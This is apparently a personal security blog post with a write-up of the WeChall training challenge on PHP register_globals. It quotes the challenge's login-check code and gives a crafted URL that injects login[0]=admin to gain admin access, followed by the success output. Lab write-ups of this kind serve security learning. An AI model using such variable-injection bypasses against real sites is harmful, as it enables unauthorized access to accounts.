What is it? @.@

Here is the place where I record some tactics about wargame, systems, and other security issues.

2012-11-12

WeChall - Training: Register Globals

Description:

PHP - Register Globals

This challenge is a relict of old PHP times, where register globals has been enabled by default, which often lead to security issues.
Again, your job is to login as admin, and you are given the sourcecode as well as highlighted version.

Here is the link to the vulnerable script.
I have also setup a test account: test:test

Enjoy!

Solution:
  1. View the source code and find the part of code below.
    ...
    if (isset($login))
    {
            echo GWF_HTML::message('Register Globals', $chall->lang('msg_welcome_back', array(htmlspecialchars($login[0]), htmlspecialchars($login[1]))));
            if (strtolower($login[0]) === 'admin') {
                    $chall->onChallengeSolved(GWF_Session::getUserID());
            }
    }
    
    ...
  2. Since there is not any checking method to check the variable $login, we could use the URL like below to bypass it and gain the userlevel of admin.
    hxxps://www.wechall.net/challenge/training/php/globals/globals.php?username=test&password=test&login[0]=admin
  3. It's done!!
    Register Globals
    Welcome back, admin.
    Your userlevel is .

No comments:

Post a Comment